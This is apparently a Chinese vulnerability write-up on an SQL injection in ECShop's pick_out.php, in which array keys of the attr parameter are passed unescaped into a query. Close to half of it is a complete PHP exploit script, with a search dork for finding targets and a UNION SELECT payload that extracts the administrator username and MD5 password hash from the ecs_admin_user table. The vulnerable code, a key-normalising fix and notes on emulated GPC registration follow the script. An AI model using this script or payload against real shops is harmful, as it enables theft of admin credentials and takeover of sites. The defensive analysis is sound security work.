ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

http://bbs.ecshop.com/thread-150545-1-1.html

1. /pick_out.php漏洞未修复
2. magic_quotes_gpc = Off

#!/usr/bin/php 
复制代码

<?php 
    //本程序只作技术交流，请不要用做非法用途！！ 
    print_r(' 
    +---------------------------------------------------------------------------+ 
    ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit 
    dork: "owered by ECShop" 
    +---------------------------------------------------------------------------+ 
    '); 
    /** 
    * works with magic_quotes_gpc = Off 
    */ 
    if ($argc < 3) 
    { 
        print_r(' 
        +---------------------------------------------------------------------------+ 
        Usage: php '.$argv[0].' host path 
        host:      target server (ip/hostname) 
        path:      path to ecshop 
        Example: 
        php '.$argv[0].' localhost /ecshop/ 
        +---------------------------------------------------------------------------+ 
        '); 
        exit; 
    } 
    error_reporting(7); 
    ini_set('max_execution_time', 0); 
    $host = $argv[1]; 
    $path = $argv[2]; 
    $resp = send(); 
    preg_match('#INs(([S]+)[a-z0-9]{32}))#', $resp, $hash); 
    if ($hash) 
    exit("Expoilt Success!
admin:	$hash[1]
Password(md5):	$hash[2]
"); 
    else 
    exit("Exploit Failed!
"); 
    function send() 
    { 
        global $host, $path; 
        $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat'; 
        $data = "GET ".$path."pick_out.php?".$cmd."  HTTP/1.1
"; 
        $data .= "Host: $host
"; 
        $data .= "Connection: Close

"; 
        $fp = fsockopen($host, 80); 
        fputs($fp, $data); 
        $resp = ''; 
        while ($fp && !feof($fp)) 
            $resp .= fread($fp, 1024); 
        return $resp; 
    } 
?>

..
/* 处理属性,获取满足属性的goods_id */
if (!empty($_GET['attr']))
{
    $attr_table = '';
    $attr_where = '';
    $attr_url   = '';
    $i = 0;
    $goods_result = '';
    foreach ($_GET['attr'] AS $key => $value)
    {
        $attr_url .= '&attr[' . $key . ']=' . $value; 
        $attr_picks[] = $key;
        if ($i > 0)
        {
            if (empty($goods_result))
            {
                break;
            }
            // 利用key进行注射
            $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attr_value='$value'");
        }
        else
        {
            $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE attr_id='$key' AND attr_value='$value'");
        }
        $i++;
    }
    ..

define('IN_ECS', true);

require(dirname(__FILE__) . '/includes/init.php');

$condition = array();
$picks = array();
$cat_id = !empty($_GET['cat_id']) ? intval($_GET['cat_id']) : 0;

if (!empty($_GET['attr']))
{
    //对输入数组进行键值(key、value)规范化处理
    foreach($_GET['attr'] as $key => $value)
    {
    /* */
        if (!is_numeric($key))
        {
            unset($_GET['attr'][$key]);
            continue;
        }
        $key = intval($key);
        $_GET['attr'][$key] = htmlspecialchars($value);
　　　　/* */
    $attr_url .= '&attr[' . $key . ']=' . $value;
    ...
    }
}

http://bbs.ecshop.com/thread-86922-1-1.html

GPC自动注册是PHP提供的原生机制，很多CMS为了保证"无视用户自身设置"，在全局入口代码中采用了"自动模拟GPC注册"的机制，类似于
/*
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) 
        ${$_k} = $_v;
}
*/

function _RunMagicQuotes(&$svar)
{
    if(!get_magic_quotes_gpc())
    {
        if( is_array($svar) )
        {
            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        }
        else
        {
            $svar = addslashes($svar);
        }
    }
    return $svar;
}

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}